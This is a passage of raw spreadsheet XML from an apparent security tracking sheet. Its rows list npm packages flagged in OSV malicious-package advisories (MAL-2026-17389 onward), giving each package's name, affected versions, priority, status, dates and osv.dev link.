          <t>npm:bungoma</t>
        </is>
      </c>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q714" s="5" t="inlineStr"/>
      <c r="R714" s="5" t="inlineStr"/>
      <c r="S71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bungoma (npm), version(s): 1.1.0, 1.0.1.</t>
        </is>
      </c>
      <c r="T714" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17389</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17390</t>
        </is>
      </c>
      <c r="D715" s="5" t="inlineStr"/>
      <c r="E715" s="5" t="inlineStr"/>
      <c r="F715" s="5" t="inlineStr"/>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="inlineStr"/>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr">
        <is>
          <t>npm:cantarella-baileys</t>
        </is>
      </c>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q715" s="5" t="inlineStr"/>
      <c r="R715" s="5" t="inlineStr"/>
      <c r="S71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cantarella-baileys (npm), version(s): 1.1.13, 1.1.12, 1.1.11.</t>
        </is>
      </c>
      <c r="T715" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17390</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17391</t>
        </is>
      </c>
      <c r="D716" s="5" t="inlineStr"/>
      <c r="E716" s="5" t="inlineStr"/>
      <c r="F716" s="5" t="inlineStr"/>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr">
        <is>
          <t>npm:eliteprotech-baileys</t>
        </is>
      </c>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q716" s="5" t="inlineStr"/>
      <c r="R716" s="5" t="inlineStr"/>
      <c r="S71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eliteprotech-baileys (npm), version(s): 1.1.2, 1.1.1, 1.1.0.</t>
        </is>
      </c>
      <c r="T716" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17391</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17392</t>
        </is>
      </c>
      <c r="D717" s="5" t="inlineStr"/>
      <c r="E717" s="5" t="inlineStr"/>
      <c r="F717" s="5" t="inlineStr"/>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr">
        <is>
          <t>npm:focashi</t>
        </is>
      </c>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q717" s="5" t="inlineStr"/>
      <c r="R717" s="5" t="inlineStr"/>
      <c r="S71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focashi (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T717" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17392</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17393</t>
        </is>
      </c>
      <c r="D718" s="5" t="inlineStr"/>
      <c r="E718" s="5" t="inlineStr"/>
      <c r="F718" s="5" t="inlineStr"/>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="inlineStr"/>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K718" s="5" t="inlineStr"/>
      <c r="L718" s="5" t="inlineStr">
        <is>
          <t>npm:ishumdz-bail</t>
        </is>
      </c>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q718" s="5" t="inlineStr"/>
      <c r="R718" s="5" t="inlineStr"/>
      <c r="S71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ishumdz-bail (npm), version(s): 1.0.16, 1.0.15, 1.0.14, 1.0.13, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.4, 1.0.3, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T718" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17393</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17394</t>
        </is>
      </c>
      <c r="D719" s="5" t="inlineStr"/>
      <c r="E719" s="5" t="inlineStr"/>
      <c r="F719" s="5" t="inlineStr"/>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="inlineStr"/>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr">
        <is>
          <t>npm:kasabaileys</t>
        </is>
      </c>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q719" s="5" t="inlineStr"/>
      <c r="R719" s="5" t="inlineStr"/>
      <c r="S71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kasabaileys (npm), version(s): 1.0.2, 1.0.1, 1.0.0, 0.3.15.</t>
        </is>
      </c>
      <c r="T719" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17394</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17395</t>
        </is>
      </c>
      <c r="D720" s="5" t="inlineStr"/>
      <c r="E720" s="5" t="inlineStr"/>
      <c r="F720" s="5" t="inlineStr"/>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="inlineStr"/>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr">
        <is>
          <t>npm:keithbaileys</t>
        </is>
      </c>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q720" s="5" t="inlineStr"/>
      <c r="R720" s="5" t="inlineStr"/>
      <c r="S72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keithbaileys (npm), version(s): 1.1.1, 1.1.0, 1.0.8.</t>
        </is>
      </c>
      <c r="T720" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17395</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17396</t>
        </is>
      </c>
      <c r="D721" s="5" t="inlineStr"/>
      <c r="E721" s="5" t="inlineStr"/>
      <c r="F721" s="5" t="inlineStr"/>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="inlineStr"/>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr">
        <is>
          <t>npm:kiyoramarkets</t>
        </is>
      </c>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q721" s="5" t="inlineStr"/>
      <c r="R721" s="5" t="inlineStr"/>
      <c r="S72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kiyoramarkets (npm), version(s): 8.0.16.</t>
        </is>
      </c>
      <c r="T721" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17396</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17397</t>
        </is>
      </c>
      <c r="D722" s="5" t="inlineStr"/>
      <c r="E722" s="5" t="inlineStr"/>
      <c r="F722" s="5" t="inlineStr"/>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="inlineStr"/>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K722" s="5" t="inlineStr"/>
      <c r="L722" s="5" t="inlineStr">
        <is>
          <t>npm:levvleys</t>
        </is>
      </c>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q722" s="5" t="inlineStr"/>
      <c r="R722" s="5" t="inlineStr"/>
      <c r="S72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levvleys (npm), version(s): 2.1.0, 2.0.26, 2.0.25, 2.0.24, 2.0.23, 2.0.22, 2.0.21, 2.0.20, 2.0.19, 2.0.18, 2.0.17, 2.0.16, 2.0.13, 2.0.12, 2.0.11, 2.0.10, 2.0.9, 2.0.8, 2.0.6, 2.0.4.</t>
        </is>
      </c>
      <c r="T722" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17397</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17398</t>
        </is>
      </c>
      <c r="D723" s="5" t="inlineStr"/>
      <c r="E723" s="5" t="inlineStr"/>
      <c r="F723" s="5" t="inlineStr"/>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr">
        <is>
          <t>npm:lilys-baileys</t>
        </is>
      </c>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q723" s="5" t="inlineStr"/>
      <c r="R723" s="5" t="inlineStr"/>
      <c r="S72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lilys-baileys (npm), version(s): 1.3.3, 1.3.2.</t>
        </is>
      </c>
      <c r="T723" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17398</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17399</t>
        </is>
      </c>
      <c r="D724" s="5" t="inlineStr"/>
      <c r="E724" s="5" t="inlineStr"/>
      <c r="F724" s="5" t="inlineStr"/>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr">
        <is>
          <t>npm:monte-md-baileys</t>
        </is>
      </c>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q724" s="5" t="inlineStr"/>
      <c r="R724" s="5" t="inlineStr"/>
      <c r="S72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monte-md-baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T724" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17399</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17400</t>
        </is>
      </c>
      <c r="D725" s="5" t="inlineStr"/>
      <c r="E725" s="5" t="inlineStr"/>
      <c r="F725" s="5" t="inlineStr"/>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr">
        <is>
          <t>npm:my-baileys</t>
        </is>
      </c>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q725" s="5" t="inlineStr"/>
      <c r="R725" s="5" t="inlineStr"/>
      <c r="S72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my-baileys (npm), version(s): 1.0.5, 1.0.4, 1.0.3, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T725" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17400</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17401</t>
        </is>
      </c>
      <c r="D726" s="5" t="inlineStr"/>
      <c r="E726" s="5" t="inlineStr"/>
      <c r="F726" s="5" t="inlineStr"/>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="inlineStr"/>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr">
        <is>
          <t>npm:noverojs</t>
        </is>
      </c>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q726" s="5" t="inlineStr"/>
      <c r="R726" s="5" t="inlineStr"/>
      <c r="S72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noverojs (npm), version(s): 1.0.4, 1.0.1.</t>
        </is>
      </c>
      <c r="T726" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17401</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17402</t>
        </is>
      </c>
      <c r="D727" s="5" t="inlineStr"/>
      <c r="E727" s="5" t="inlineStr"/>
      <c r="F727" s="5" t="inlineStr"/>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="inlineStr"/>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr">
        <is>
          <t>npm:noxleyss</t>
        </is>
      </c>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q727" s="5" t="inlineStr"/>
      <c r="R727" s="5" t="inlineStr"/>
      <c r="S72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 (npm), version(s): 1.1.11, 1.1.8, 1.1.7, 1.1.6, 1.1.5, 1.1.4, 1.1.3, 1.1.2, 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T727" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17402</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17403</t>
        </is>
      </c>
      <c r="D728" s="5" t="inlineStr"/>
      <c r="E728" s="5" t="inlineStr"/>
      <c r="F728" s="5" t="inlineStr"/>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="inlineStr"/>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr">
        <is>
          <t>npm:noxxleys</t>
        </is>
      </c>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q728" s="5" t="inlineStr"/>
      <c r="R728" s="5" t="inlineStr"/>
      <c r="S72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noxxleys (npm), version(s): 1.1.6, 1.1.5, 1.1.4, 1.1.2, 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T728" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17403</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17404</t>
        </is>
      </c>
      <c r="D729" s="5" t="inlineStr"/>
      <c r="E729" s="5" t="inlineStr"/>
      <c r="F729" s="5" t="inlineStr"/>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="inlineStr"/>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr">
        <is>
          <t>npm:saturn-baileys</t>
        </is>
      </c>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q729" s="5" t="inlineStr"/>
      <c r="R729" s="5" t="inlineStr"/>
      <c r="S72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saturn-baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T729" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17404</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17405</t>
        </is>
      </c>
      <c r="D730" s="5" t="inlineStr"/>
      <c r="E730" s="5" t="inlineStr"/>
      <c r="F730" s="5" t="inlineStr"/>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="inlineStr"/>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr">
        <is>
          <t>npm:shadowmd</t>
        </is>
      </c>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q730" s="5" t="inlineStr"/>
      <c r="R730" s="5" t="inlineStr"/>
      <c r="S73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shadowmd (npm), version(s): 8.6.87.</t>
        </is>
      </c>
      <c r="T730" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17405</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17406</t>
        </is>
      </c>
      <c r="D731" s="5" t="inlineStr"/>
      <c r="E731" s="5" t="inlineStr"/>
      <c r="F731" s="5" t="inlineStr"/>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="inlineStr"/>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K731" s="5" t="inlineStr"/>
      <c r="L731" s="5" t="inlineStr">
        <is>
          <t>npm:spencer-baileys</t>
        </is>
      </c>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q731" s="5" t="inlineStr"/>
      <c r="R731" s="5" t="inlineStr"/>
      <c r="S73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spencer-baileys (npm), version(s): 1.0.4.</t>
        </is>
      </c>
      <c r="T731" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17406</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17407</t>
        </is>
      </c>
      <c r="D732" s="5" t="inlineStr"/>
      <c r="E732" s="5" t="inlineStr"/>
      <c r="F732" s="5" t="inlineStr"/>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr">
        <is>
          <t>npm:syncxbails</t>
        </is>
      </c>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q732" s="5" t="inlineStr"/>
      <c r="R732" s="5" t="inlineStr"/>
      <c r="S73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syncxbails (npm), version(s): 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T732" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17407</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17408</t>
        </is>
      </c>
      <c r="D733" s="5" t="inlineStr"/>
      <c r="E733" s="5" t="inlineStr"/>
      <c r="F733" s="5" t="inlineStr"/>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr">
        <is>
          <t>npm:whalibmob</t>
        </is>
      </c>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q733" s="5" t="inlineStr"/>
